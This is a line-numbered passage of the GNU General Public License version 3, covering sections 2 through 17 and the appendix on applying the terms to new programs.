You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 
196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 
229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 
256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 
287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 
317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. 
If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 
386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 
421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. 
If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 
486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 
512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. 
If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 
578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 
613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | [one line to give the program's name and a brief idea of what it does.] 635 | Copyright (C) [year] [name of author] 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see https://www.gnu.org/licenses/. 649 | 650 | Also add information on how to contact you by electronic and paper mail. 
651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | [program] Copyright (C) [year] [name of author] 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | https://www.gnu.org/licenses/. 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | https://www.gnu.org/licenses/why-not-lgpl.html. --------------------------------------------------------------------------------